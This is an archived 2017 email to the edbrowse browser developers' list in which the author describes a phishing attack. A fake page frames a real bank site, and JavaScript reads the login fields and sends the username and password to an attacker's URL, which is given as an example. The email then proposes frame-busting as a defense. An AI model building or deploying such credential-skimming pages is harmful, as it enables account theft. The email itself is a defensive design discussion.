From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=2001:558:fe21:29:69:252:207:41; helo=resqmta-ch2-09v.sys.comcast.net; envelope-from=eklhad@comcast.net; receiver= X-Greylist: delayed 488 seconds by postgrey-1.37 at cbrannon.xen.prgmr.com; Wed, 09 Aug 2017 21:05:12 PDT Received: from resqmta-ch2-09v.sys.comcast.net (resqmta-ch2-09v.sys.comcast.net [IPv6:2001:558:fe21:29:69:252:207:41]) by hurricane.the-brannons.com (Postfix) with ESMTPS id E71E87A4A7 for ; Wed, 9 Aug 2017 21:05:12 -0700 (PDT) Received: from resomta-ch2-17v.sys.comcast.net ([69.252.207.113]) by resqmta-ch2-09v.sys.comcast.net with ESMTP id febQdwFSbge3YfebVd2NRi; Thu, 10 Aug 2017 03:57:49 +0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=comcast.net; s=q20161114; t=1502337469; bh=A4neyxyL1ma+p+keIYmQ3bQ1+I8vas/tVh3sSHT1ORM=; h=Received:Received:To:From:Reply-to:Subject:Date:Message-ID: Mime-Version:Content-Type; b=oFcAVrK4f3rb56U9oy19r0332H/TaI8Bif9rIY4KIqQG49Yuf4v/B/673R9wuYMhL SeNyvs5a8ZYpUlD16QqjJ8VqK0dmiRXORzsriuVKX9Kg79qmr71EYy08FHzRE7LATw MmYr5jTExXL09WKMVNBKTTlv5xRpCx5aRmoB+RnhaLvYakWEwjyVbyQFSbWSjrFfU9 UHpgjnwjiowvAxsGJobr44/+zZ7QpLUXbtokNItdqxmgIHcebUaKq3qMNXjqCsq5VS OELY1yP72ht0/JjoOtgkXUdmB86wX/HpOdd9DXyy/gqodKKQcMM8kYbz0mToQS3goT 7oZs8JmkYmJnA== Received: from unknown ([IPv6:2601:408:c301:784d:21e:4fff:fec2:a0f1]) by resomta-ch2-17v.sys.comcast.net with SMTP id febUd1tewuwmnfebVdWPaL; Thu, 10 Aug 2017 03:57:49 +0000 To: Edbrowse-dev@lists.the-brannons.com From: Karl Dahlke Reply-to: Karl Dahlke User-Agent: edbrowse/3.7.0+ Date: Wed, 09 Aug 2017 23:57:48 -0400 Message-ID: <20170709235748.eklhad@comcast.net> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary=nextpart-eb-125694 Content-Transfer-Encoding: 7bit X-CMAE-Envelope: MS4wfAhePwuSbpxN+AdbGoGh2ymHOn0rjFFFMqOxC9kCFxLfOFlUbBc3nqY5xZ1z/x///O+HanCJLFwGJ+gZ0n/tbKvwPZzJqtt/bhcFtmya2sZKSeHZgY+F +U0bAxiOU541i68hBklaz4G7jMi6H0P5RotGVVinlyVMPkFxI27Ty+rX Subject: [Edbrowse-dev] frames and security X-BeenThere: edbrowse-dev@lists.the-brannons.com X-Mailman-Version: 2.1.24 Precedence: list List-Id: Edbrowse Development List List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 10 Aug 2017 04:05:13 -0000 This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. --nextpart-eb-125694 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable So if I had an email server in China that spewed out millions of = phishing emails each day, I could have those emails direct the user to = a false site that was a blank window with a frame inside and that frame = brings up Bank of America.com. This isn't a fake Bank of America site with copies of their logos and a = perfect reproduction, no, it's their real site with the up to date = images and even the personal picture that you selected, that goes with your cookie and = your account, that comes up for security so you know it's the real site. But it's under my frame. You start to log in, you put in your user name and password, and before = you can press submit, my javascript is dipping into the Bank of America objects every quarter = second, specifically the values of the input fields of the form. Before you can log in my javascript captures your user name and = password, and it sends them to me. How? By putting them as search on an http request to my website, which js = can do. https://my. china.site.com/boa?user=3Dusername&pass=3Dpassword Isn't that all entirely doable, on any browser, including (perhaps) = edbrowse? I can only think of one defense against this. In a hierarchy of frames, parent points to the frame above you, the = frame that contains you, and top points to the top window that started = it all, or at least that's how I think it's suppose to work. So bank of America, and every site that deals with critical = information, should check if(top !=3D window) { Replace the entire page with a warning that this page cannot be a frame = in a larger page, and you are visiting a false site that is trying to = jack your account information, and you should be more careful what you = click on in your emails. } That's all I can think of. Anyways this is a long story to note that edbrowse now has parent and = top as described above. It was only 12 lines of code, so I like that. On another note, I'm not entirely sure I set the right frame on various = commands. If you click a button or hyperlink or anything that runs js, do I take = the time to set the context according to the frame you're in? I'm not sure... Maybe these are things I should have checked before 3.7.0, but I = imagine 3.7.1 will come soon enough, with these kinds of bug fixes, and the new autoexpansion of frames, = which should make more sites accessible. Is there still a couple months before the distros put their packages = together? I imagine they are all independent of each other, so maybe that's a = silly question. We just plug away as we can. Karl Dahlke --nextpart-eb-125694--